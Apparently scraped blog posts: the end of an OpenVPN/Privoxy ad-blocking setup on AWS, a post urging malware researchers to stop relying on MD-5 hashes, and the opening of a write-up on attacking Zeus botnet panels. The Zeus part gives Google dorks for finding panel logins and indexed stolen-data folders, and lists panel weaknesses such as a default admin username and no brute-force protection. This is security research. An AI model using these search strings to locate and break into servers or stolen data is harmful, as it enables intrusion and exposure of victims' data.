<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiirqVf7n0TioLVeUwUrsxiwyLIHBj0sxV7GpIUKYm0jTjx5HGBKnL9EAYaA-uILomIecURNVKeORwiZZ2fHTKQCQ4Z9SvvX8e4PWvhGSCzS3lnGAvN0sKKfOZ-1UHMWG0uLPGFI-drN7El/s1600/aws_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiirqVf7n0TioLVeUwUrsxiwyLIHBj0sxV7GpIUKYm0jTjx5HGBKnL9EAYaA-uILomIecURNVKeORwiZZ2fHTKQCQ4Z9SvvX8e4PWvhGSCzS3lnGAvN0sKKfOZ-1UHMWG0uLPGFI-drN7El/s1600/aws_3.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmd5519SFJcBAWwNbgiFZa_YRpkRKthuU9rPdiT6TwsHUCmnV3s-mIYx73WUs_HZM6KHRhkdAo7uRLlnPt0Nck3PTV2LlltjT6LlGnB1b9gHhl4waFdDAfskZSPSXm5lhl0MSh3Mia8Rwg/s1600/aws_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmd5519SFJcBAWwNbgiFZa_YRpkRKthuU9rPdiT6TwsHUCmnV3s-mIYx73WUs_HZM6KHRhkdAo7uRLlnPt0Nck3PTV2LlltjT6LlGnB1b9gHhl4waFdDAfskZSPSXm5lhl0MSh3Mia8Rwg/s1600/aws_2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h2>
VPN</h2>
</div>
<div style="text-align: justify;">
For the VPN program, I recommend the free version of the OpenVPN AS (EDIT: be sure to use <a href="https://community.openvpn.net/openvpn/wiki/heartbleed">OpenVPN AS 2.0.6</a> or later, both on the server and the client). <a href="https://openvpn.net/index.php/access-server/docs/quick-start-guide.html">Easy to set-up quick start guide is here</a>, GUI based configuration, and one-click client installer for Android, iOS, Windows, Linux, OSX. The Ubuntu installer packages are <a href="https://openvpn.net/index.php/access-server/download-openvpn-as-sw/113.html?osfamily=Ubuntu">here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmmK5DNgqHBB_ug_O9JdjAUyCcdxOWvn7Ea5a-xi0yIQ-MpVhRKtsdR8IL89WnQPZqEHt4X_LGnNL4vTtWbJ2kXd3FfuTfZ0Hn7IAEgtjBC2sHHWLv-_Y4Y_Yv9bLzJ6svM_V83FzDkOP_/s1600/openvpn1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmmK5DNgqHBB_ug_O9JdjAUyCcdxOWvn7Ea5a-xi0yIQ-MpVhRKtsdR8IL89WnQPZqEHt4X_LGnNL4vTtWbJ2kXd3FfuTfZ0Hn7IAEgtjBC2sHHWLv-_Y4Y_Yv9bLzJ6svM_V83FzDkOP_/s1600/openvpn1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0UvqgEL8xXAhyphenhyphenbHk0UYazs8_uRyngk4Wu0nTb3SNNtgtZAbd8BmIxZcQLwbtkDXVWk5Z3HrYEtBhQfhojGS58FNLr3d_vGKcqhyphenhyphenc-CL-z8YMM7MKf3DAoECSY-OYOCmOqSY_1XWmuP0gD/s1600/openvpn2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0UvqgEL8xXAhyphenhyphenbHk0UYazs8_uRyngk4Wu0nTb3SNNtgtZAbd8BmIxZcQLwbtkDXVWk5Z3HrYEtBhQfhojGS58FNLr3d_vGKcqhyphenhyphenc-CL-z8YMM7MKf3DAoECSY-OYOCmOqSY_1XWmuP0gD/s1600/openvpn2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFVTTlidrVK0jbEpaS0OagKwByUaqomvExXPyYnsm-SGi0XLxTtuS4oI7w-RZTiFJ9slvo3nQL29H2gBXE-hl0bWLK2cCgDqgLNrb4KCYV-IKJPUqnOgJgAEqFj-h1ozwNyGcu4CSEQpUs/s1600/openvpn3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFVTTlidrVK0jbEpaS0OagKwByUaqomvExXPyYnsm-SGi0XLxTtuS4oI7w-RZTiFJ9slvo3nQL29H2gBXE-hl0bWLK2cCgDqgLNrb4KCYV-IKJPUqnOgJgAEqFj-h1ozwNyGcu4CSEQpUs/s1600/openvpn3.png" width="330" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
<div style="text-align: justify;">
The most important settings:<br />
<br />
<ul>
<li>I prefer to use the TCP 443 and UDP 53 ports for my OpenVPN setup, and let the user guess why. </li>
<li>For good performance, UDP is preferred over TCP. </li>
<li>VPN mode is Layer 3 (routing/NAT).</li>
<li>Don't forget to allow the configured VPN ports in the AWS firewall (security groups). </li>
</ul>
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQsMquSS813nLT0kQhEeBZkPUNlJSWbBnLglpOV7kNRz9VdJmQzo_Ai17gXLByj4iYR5TG1aOwrfC0p2pqjSAJWjKZK0IRCok50ZXd8LkK2NF8bYhLQgTfVaCcDRWDyhLd3tUPdyaOg46A/s1600/aws_security_groups.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQsMquSS813nLT0kQhEeBZkPUNlJSWbBnLglpOV7kNRz9VdJmQzo_Ai17gXLByj4iYR5TG1aOwrfC0p2pqjSAJWjKZK0IRCok50ZXd8LkK2NF8bYhLQgTfVaCcDRWDyhLd3tUPdyaOg46A/s1600/aws_security_groups.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
<div style="text-align: justify;">
Other VPN settings:</div>
<div style="text-align: justify;">
<div>
<ul>
<li>Should VPN clients have access to private subnets (non-public networks on the server side)? - Yes</li>
<li>Should client Internet traffic be routed through the VPN? - Yes</li>
</ul>
</div>
<div>
<h2>
</h2>
<h2>
Privoxy</h2>
The next component we have to install and configure is Privoxy. As usual, "apt-get install privoxy" just works. The next step is to configure privoxy via /etc/privoxy/config file, there are two options to change:</div>
</div>
<div style="text-align: justify;">
<ul>
<li>listen-address your.ip.add.ress:8118</li>
<li>accept-intercepted-requests 1</li>
</ul>
</div>
<div style="text-align: justify;">
Beware not to allow everyone accessing your Privoxy server in the AWS EC2 security groups, be sure it is reachable only to VPN users!<br />
<br />
After everything is set, start privoxy with "service privoxy start", and add it to the autostart "update-rc.d privoxy defaults".<br />
<br /></div>
<div style="text-align: justify;">
<h2>
Iptables</h2>
</div>
<div style="text-align: justify;">
And the final step is to configure your iptables chain to forward every web traffic from the VPN clients to the Privoxy server:<br />
<br /></div>
<div style="text-align: justify;">
<pre class="prettyprint">iptables -t nat -A PREROUTING -s 5.5.0.0/16 -p tcp -m multiport --dports 80,8080,81 -j DNAT --to-destination your.ip.add.ress:8118
</pre>
<br /></div>
<div style="text-align: justify;">
Optionally you can block access to all other ports as well, and what does not go through your Privoxy won't be reachable.</div>
<div style="text-align: justify;">
Based on your Linux distribution and preference, you might make this rule persistent.<br />
<br /></div>
<div style="text-align: justify;">
<h3>
Final test</h3>
</div>
<div style="text-align: justify;">
Now you can connect to the VPN server from your Android device.<br />
<div>
After logging in from a client, you get the following nice packages to install on your device:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5NelhkkIV3tQLuEpA1kIFlZ9Yjz2Bnwj8GUh50puoTo96_UbEsfsHMINVEDXF4mGrzdKxQ_IJd6o2_DjbUOlaWL9FyKnb2nprGVH1O7ZBRivgYf5sfbiEdmpccNQJInAeUvtMrwHrRHen/s1600/openvpn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5NelhkkIV3tQLuEpA1kIFlZ9Yjz2Bnwj8GUh50puoTo96_UbEsfsHMINVEDXF4mGrzdKxQ_IJd6o2_DjbUOlaWL9FyKnb2nprGVH1O7ZBRivgYf5sfbiEdmpccNQJInAeUvtMrwHrRHen/s1600/openvpn.png" width="297" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVlq2oOM-J54RiUA2lZ1EnUmFam2rVcJAxWINkEFb-sos4DZzevf0TbVXNZvL2uea5Li7AEgFYzUIiSpFUtg0QaTxTXFabc1BY9Nkr8w5fHEHPvTyotgz1T8VT4qtXQhHnK_S0qgI-eBa_/s1600/2014-04-01+08.57.36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVlq2oOM-J54RiUA2lZ1EnUmFam2rVcJAxWINkEFb-sos4DZzevf0TbVXNZvL2uea5Li7AEgFYzUIiSpFUtg0QaTxTXFabc1BY9Nkr8w5fHEHPvTyotgz1T8VT4qtXQhHnK_S0qgI-eBa_/s1600/2014-04-01+08.57.36.png" width="180" /></a></div>
<div>
<br /></div>
After connecting, the final results can be seen in the following screenshots. And yes, there is a reason I chose <a href="http://www.fireeye.com/blog/technical/mobile-threats/2014/03/a-little-bird-told-me-personal-information-sharing-in-angry-birds-and-its-ad-libraries.html">Angry Birds</a> as an example.<br />
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwVC_5ZRpT2vltWtAATm8FPzl_if3B7I8sKy4tvwosAqcLQRv02TAL7lKIPmK7f4ZJKsWvjkVrLL3z5Ky_tLwT-UXqJyOY8irBYF-pPsqBvWrkh4MyKNd7k5s7sWHzjf2JnNr8kFptsp6p/s1600/2014-03-28+22.10.53.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwVC_5ZRpT2vltWtAATm8FPzl_if3B7I8sKy4tvwosAqcLQRv02TAL7lKIPmK7f4ZJKsWvjkVrLL3z5Ky_tLwT-UXqJyOY8irBYF-pPsqBvWrkh4MyKNd7k5s7sWHzjf2JnNr8kFptsp6p/s1600/2014-03-28+22.10.53.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Angry Birds without Privoxy</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPm37ogJwN6mn0Sj_Den7qslw5DhbG3uCGN7LbSs1fRDHTEnfscNgELxrLeAo4OehYePfVKDoFJlYBCrTOb9aYb4LQJsYK58aK5JAlgbl9iBL8fGbrmjbtFz7Te4eHQuXvCLhNjjc4lM2y/s1600/2014-03-28+22.13.21.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPm37ogJwN6mn0Sj_Den7qslw5DhbG3uCGN7LbSs1fRDHTEnfscNgELxrLeAo4OehYePfVKDoFJlYBCrTOb9aYb4LQJsYK58aK5JAlgbl9iBL8fGbrmjbtFz7Te4eHQuXvCLhNjjc4lM2y/s1600/2014-03-28+22.13.21.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Angry Birds with Privoxy</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv57Qx5RzJfTcSZdDRBbQAmglBlukjWPMDfH5QQamayOgNqBThtnj1gHL6aRBzQJ3BqvtNDkDIkkqen31SRy30YEgqRxGnAPIX9AP1YAhrir_VfvsLNi2xZR5blXOe7EAxwlxe0MsBPfWp/s1600/2014-03-28+22.15.11.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv57Qx5RzJfTcSZdDRBbQAmglBlukjWPMDfH5QQamayOgNqBThtnj1gHL6aRBzQJ3BqvtNDkDIkkqen31SRy30YEgqRxGnAPIX9AP1YAhrir_VfvsLNi2xZR5blXOe7EAxwlxe0MsBPfWp/s1600/2014-03-28+22.15.11.png" width="180" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Stupid flashlight app with ad</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6to_fuVWMhrU1U9PvhR_yF_aMjvcp-nCXCGa_-mmOgi7BAlkxYu61jN8mHIGY1uIWCH2uUMql2bIFCvkQc9deXpHoCueYO6hPapXcWIrGgdvqsZcNSzP5ehaMbHB_0xwGkd9ip7Jwg9bk/s1600/2014-03-28+14.22.00.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6to_fuVWMhrU1U9PvhR_yF_aMjvcp-nCXCGa_-mmOgi7BAlkxYu61jN8mHIGY1uIWCH2uUMql2bIFCvkQc9deXpHoCueYO6hPapXcWIrGgdvqsZcNSzP5ehaMbHB_0xwGkd9ip7Jwg9bk/s1600/2014-03-28+14.22.00.png" width="180" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Stupid flashlight app with Privoxy</td></tr>
</tbody></table>
<div style="text-align: justify;">
<b>Spoiler alert</b></div>
<div style="text-align: justify;">
If you are afraid of NSA tracking you, this post is not for you. If you want to achieve IP layer anonymity, this post is not for you. As long as you are the only one using that service, it should be trivial to see what could possibly go wrong with that.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Known issues</b></div>
<div style="text-align: justify;">
Whenever the Internet connection (Wifi, 3G) drops, the VPN connection drops as well, and your privacy is gone ...</div>
<div style="text-align: justify;">
Sites breaking your privacy through SSL can still do that as long as the domain is not in the Privoxy blacklist.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Additional recommendation</b></div>
<div style="text-align: justify;">
If you are using OSX or Windows, I can recommend Aviator to be used as your default browser. It is just great, give it a try!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>PS:</b> There are also some <a href="https://adblockplus.org/blog/adblock-plus-for-android-removed-from-google-play-store">adblock apps removed from the official store</a> which can block some ads, but you have to configure a proxy for every WiFi connection you use, and it is not working over 3G.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVVTdod23AOgD-EVUqT6vrU0iBe3gR4k8yU2vWx5Gen3PvtY8E8xvCpZNPjsY6FXC2VrDSKAhX7XJid4HpQIuNseNFDzxoGT_Sf5DkiyQqu0MGZLR_ukH2d4klR272T2XaSVtRKJLNwWfJ/s1600/Mikko_Privacy_is_not_negotiable.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVVTdod23AOgD-EVUqT6vrU0iBe3gR4k8yU2vWx5Gen3PvtY8E8xvCpZNPjsY6FXC2VrDSKAhX7XJid4HpQIuNseNFDzxoGT_Sf5DkiyQqu0MGZLR_ukH2d4klR272T2XaSVtRKJLNwWfJ/s1600/Mikko_Privacy_is_not_negotiable.png" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com2tag:blogger.com,1999:blog-7429675726481888518.post-86488491968267849302014-03-25T09:30:00.000+01:002019-10-08T15:59:37.337+02:00Stop using MD-5, now!<div style="text-align: justify;">
TL;DR: <u>Don't use MD-5 to identify malware samples. Believe me, it is a bad idea. Use SHA-256 or a stronger hash function.</u></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This post is dedicated to <a href="https://www.google.com/search?q=md5+malware+-sha&ie=UTF-8#q=md5+malware+trojan+-sha+-sha1+-sha256&tbs=qdr:y" target="_blank">all malware researchers</a>, still using MD-5 to identify malware samples.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Before deep-diving into the details, let me explain my view on this topic. Whenever you want to identify a malware, it is only OK to publish the MD-5 hash of the malware if you post at least the SHA-256 hash of the malware as well. Publishing only the MD-5 hash is <b><u>unprofessional</u></b>. If you want to understand why, please continue reading. If you know about the problem, but want to help me spread the word, please link to my site <a href="http://www.stopusingmd5now.com/" target="_blank">www.stopusingmd5now.com</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
By writing articles/posts/etc. and publishing the MD-5 hash only, it is the lesser problem that you show people your incompetency about hash functions, but you also teach other people to use MD-5. And it spreads like a disease... Last but not least, if I find a sample on your blog post, and you use MD-5 only, I can't be sure we have the same sample.<br />
<br />
Here is a list to name a few bad examples (order is in Google search rank order):<br />
<ul>
<li><a href="https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware">Kaspersky</a></li>
<li><a href="http://labs.bromium.com/2014/01/13/understanding-malware-targeting-point-of-sale-systems/">Bromium</a></li>
<li><a href="http://www.fireeye.com/blog/technical/malware-research/2013/06/trojan-apt-seinup-hitting-asean.html">Fireeye</a></li>
<li><a href="http://www.webroot.com/blog/2013/10/21/u-k-users-targeted-fake-confirming-sky-offer-themed-malware-serving-emails/">Webroot</a></li>
<li><a href="https://blogs.mcafee.com/mcafee-labs/hesperus-evening-star-shines-as-latest-banker-trojan">Mcafee</a></li>
<li><a href="http://blog.fox-it.com/2013/07/25/analysis-of-the-kins-malware/">Fox-IT</a></li>
<li><a href="http://blogs.cisco.com/security/fake-phone-bills-contain-malware-targeting-dt-customers/">Cisco</a></li>
<li><a href="https://isc.sans.edu/forums/diary/Mr+Jones+wants+you+to+appear+in+court/17279">SANS</a></li>
<li><a href="http://www.welivesecurity.com/wp-content/uploads/2013/08/Brazilian_Malware1.pdf">ESET</a></li>
<li><a href="http://www.symantec.com/security_response/writeup.jsp?docid=2013-091614-5535-99&tabid=2">Symantec</a></li>
<li><a href="http://watchguard.com/docs/datasheet/wg_apt-blocker_ds.pdf" target="_blank">Watchguard</a></li>
<li>And unfortunately, even the best books on malware analysis promote the use of MD-5 - see "Practical malware analysis" Chapter 1 Page 10</li>
</ul>
</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirXsF4XAkg2_c5e9_92kToY5AxO2njO1KqexIza6k2dRwut7md1YGhhFPr51CuwwQrmhcSeHX8HZHZG7hjT_LU3R29i0MJIkehWy-glO3JL-3jNTs6wyrylJXIFFdSFMRnSgUlR3MykSYJ/s1600/46960563.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirXsF4XAkg2_c5e9_92kToY5AxO2njO1KqexIza6k2dRwut7md1YGhhFPr51CuwwQrmhcSeHX8HZHZG7hjT_LU3R29i0MJIkehWy-glO3JL-3jNTs6wyrylJXIFFdSFMRnSgUlR3MykSYJ/s1600/46960563.jpg" width="318" /></a></div>
<br />
<h3 style="text-align: justify;">
Introduction to (cryptographic) hash functions</h3>
<div style="text-align: justify;">
A long time ago (according to some sources since <a href="http://www.cosic.esat.kuleuven.be/publications/article-1532.pdf" target="_blank">1970</a>) people started designing hash functions, for an awful lot of different reasons. It can be used for file integrity verification, password verification, pseudo-random generation, etc. But one of the most important properties of a cryptographic hash function is that it can "uniquely" identify a block of data with a small, fixed bit string. E.g., malware can be identified by using only the hash itself, so everybody who has the same malware sample will have the same hash; thus they can refer to the malware by the hash itself.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It is easy to conclude that there will always be collisions, where a different block of data has the same result hashes. The domain (block of data) is infinite, while the codomain (possible hash values) is finite. The question is how easy it is to find two different blocks of data, having the same hash. Mathematicians call this property "<a href="http://en.wikipedia.org/wiki/Cryptographic_hash_function#Properties" target="_blank">collision resistance</a>." Proper cryptographic hash functions are collision-resistant, meaning it is impractical or impossible to find two different blocks of data, which have the same hash.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In 1989 Ronald Rivest (the first letter in the abbreviation of the RSA algorithm) designed the MD-2 hashing algorithm. <a href="http://en.wikipedia.org/wiki/MD2_(cryptography)#Security" target="_blank">Since 1997</a> there are publications about that this hashing algorithm is far from perfect.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In 1990 Ronald Rivest designed the MD-4 algorithm, which is considered as broken <a href="http://en.wikipedia.org/wiki/MD4#Security" target="_blank">at least from 1991</a>. But MD-4 is still in use from Windows XP until Windows 8 in the password protocol (NTLM). Unfortunately, there are more significant problems with NTLM besides using MD-4, but this can be the topic of a different blog post.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In 1991 (you might guess who) designed yet another hashing algorithm called MD-5, to replace MD-4 (because of the known weaknesses). But again, in from 1993 it has been shown many times that MD-5 is broken as well. According to Wikipedia, "On 18 March 2006, Klima published an algorithm [17] that can find a collision within one minute on a single notebook computer, using a method he calls tunneling". This means, that with the 8 years old computing power of a single notebook one can create two different files having the same MD-5 hash. But the algorithms to generate collisions have been improved since, and "a 2013 attack by Xie Tao, Fanbao Liu, and Dengguo Feng breaks MD-5 collision resistance in 2^18 time. This attack runs in less than a second on a regular computer." The key takeaway here is that it is pretty damn hard to design a secure cryptographic hash function, which is fast, but still safe. I bet that if I would develop a hash function, Ron would be able to hack it in minutes.</div>
<div style="text-align: justify;">
<br />
Now, dear malware researcher, consider the following scenario. You as, a malware analyst, find a new binary sample. You calculate the MD-5 hash of the malware, and <a href="https://www.google.com/search?q=md5+malware+-sha&ie=UTF-8#q=md5+malware+trojan+-sha+-sha1+-sha256&tbs=qdr:y" target="_blank">Google for that hash</a>. You see this hash value on other malware researchers or on a sandbox/vendor's site. This site concludes that this sample does this or that, and is either malicious or not. Either because the site is also relying solely on MD-5 or because you have only checked the MD-5 and the researcher or sandbox has a good reputation, you move on and forget this binary. But in reality, it is possible that your binary is totally different than the one analyzed by others. The results of this mistake can scale from nothing to catastrophic.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you don't believe me, just check the hello.exe and erase.exe on <a href="http://www.mscs.dal.ca/~selinger/md5collision/">this site from</a><a href="http://www.mscs.dal.ca/~selinger/md5collision/" style="text-decoration: underline;"> Peter Sellinger</a>. Same MD-5, different binaries; a harmless and a (fake) malicious one... And you can do the same easily at home. No supercomputers, no NSA magic needed.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
On a side-note, it is important to mention that even today <a href="http://en.wikipedia.org/wiki/MD5#Preimage_vulnerability" target="_blank">it can be hard to find</a> a block of data (in generic), if only the MD-5 hash is known ("pre image resistance"). I have heard people arguing this when I told them using MD-5 as a password hash function is a bad idea. The main problem with MD-5 as a password hash is not the weaknesses in MD-5 itself, but the lack of <a href="http://en.wikipedia.org/wiki/Salt_(cryptography)" target="_blank">salt</a>, lack of <a href="http://en.wikipedia.org/wiki/PBKDF2" target="_blank">iterations</a>, and lack of <a href="http://en.wikipedia.org/wiki/Scrypt" target="_blank">memory hardness</a>. But still, I don't see any reason why you should use MD-5 as a building block for anything, which has anything to do with security. Would you use a car to drive your children to the school, which car has not been maintained in the last 23 year? If your answer is yes, you should neither have children nor a job in IT SEC.</div>
<h3 style="text-align: justify;">
Conclusion</h3>
<div style="text-align: justify;">
If you are a malware researcher, and used MD-5 only to identify malware samples in the past, I suggest to write it down 1000 times: "I promise I won't use MD-5 to identify malware in the future."</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I even made a website dedicated to this problem, <a href="http://www.stopusingmd5now.com/" target="_blank">www.stopusingmd5now.com</a> . The next time you see a post/article/whatever where malware is identified by the MD-5 hash only, please link to this blog post or website, and the world will be a better and more professional place.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio2e5J36WgVwB2-ZGtkXWgNCCnXXghIuTvp90IZeJnU7UZosCVXG0G63XWNNDl3WsPi6JM5WRZ7L_m11bE-M-43ARlWPor5WZck6zto0OQksbCcal7jQLaxc8Bs5OwuJ-_NQHT9miwayMa/s1600/bart-simpson-chalkboard_www-txt2pic-com.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio2e5J36WgVwB2-ZGtkXWgNCCnXXghIuTvp90IZeJnU7UZosCVXG0G63XWNNDl3WsPi6JM5WRZ7L_m11bE-M-43ARlWPor5WZck6zto0OQksbCcal7jQLaxc8Bs5OwuJ-_NQHT9miwayMa/s1600/bart-simpson-chalkboard_www-txt2pic-com.jpg" width="640" /></a></div>
<br />
PS: If you are a forensics investigator, or software developer developing software used in forensics, the same applies to you.<br />
PS 2: If you find this post too provocative and harsh, there is a reason for this ...<br />
<br />
<a href="https://www.blogger.com/null" name="update">Update</a>: I have modified two malware (<a href="https://malwr.com/analysis/Y2M4Zjc4OWE0YmExNDA2MWE5YjFhODM5YjliNmI0MTY/">Citadel</a>, <a href="https://malwr.com/analysis/YTc4Zjg0YTM0MTBhNDJiZDk4ZjFlODAwNjEzODM0YWQ/">Atrax</a>) with the help of <a href="https://code.google.com/p/hashclash/">HashClash</a>, and now those have the same MD-5. Many thanks for Marc Stevens for his research, publishing his code, and help given during the collision finding.Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-17041460934667018612014-02-14T11:09:00.000+01:002019-10-08T16:00:32.082+02:00Attacking financial malware botnet panels - Zeus<div style="text-align: justify;">
I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
First things first, here are some Google dorks to find Zeus C&C server panel related stuff:</div>
<div style="text-align: justify;">
</div>
<ul>
<li>inurl:cp.php?m=login - this should be the login to the control panel</li>
<li>inurl:_reports/files - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google</li>
<li>inurl:install/index.php - this should be deleted, but I think this is useless now.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1TLdBaEi66Giq_90CrWFmv1uvJ5dx5WY3V3H284CkkfV8AlKxxWY_W8tbT4QV62P4ae2ilx-XcEdlvbCTuVdPJgID8bFB_XdMLZwgxhgWePYEsvr5DMPWG-Sv3pwGq88hYqkpbK1xj1L3/s1600/Zeus1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1TLdBaEi66Giq_90CrWFmv1uvJ5dx5WY3V3H284CkkfV8AlKxxWY_W8tbT4QV62P4ae2ilx-XcEdlvbCTuVdPJgID8bFB_XdMLZwgxhgWePYEsvr5DMPWG-Sv3pwGq88hYqkpbK1xj1L3/s1600/Zeus1.png" width="400" /></a></div>
<br />
<h3>
Boring vulns found</h3>
<ul>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_Credentials_Transported_over_an_Encrypted_Channel_(OWASP-AT-001)">Clear text HTTP login</a> - you can sniff the login password via MiTM, or steal the session cookies</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OWASP-AT-008)">No password policy</a> - admins can set up really weak passwords</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_Weak_lock_out_mechanism_(OWASP-AT-004)">No anti brute-force</a> - you can try to guess the admin's password. Default username is admin</li>
<li style="text-align: justify;"><a href="https://www.owasp.org/index.php/Testing_for_Vulnerable_Remember_Password_(OWASP-AT-006)">Password autocomplete enabled</a> - boring</li>
